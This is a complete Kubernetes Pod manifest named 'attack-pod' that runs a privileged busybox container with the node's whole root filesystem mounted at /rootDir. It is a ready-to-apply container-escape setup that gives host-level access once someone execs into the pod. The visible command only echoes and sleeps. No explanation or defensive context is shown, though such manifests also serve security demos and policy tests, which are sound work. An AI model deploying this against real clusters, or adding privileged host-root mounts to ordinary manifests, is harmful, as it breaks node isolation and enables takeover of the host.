apiVersion: v1
kind: Pod
metadata:
  name: attack-pod
  namespace: default
spec:
  containers:
  - image: busybox
    imagePullPolicy: IfNotPresent
    name: attack-container
    volumeMounts:
      - mountPath: /rootDir
        name: host
    securityContext:
      privileged: true
    args:
    - /bin/sh
    - -c
    - echo hello;sleep 3600
  volumes:
  - name: host
    hostPath:
      path: /
      type: Directory
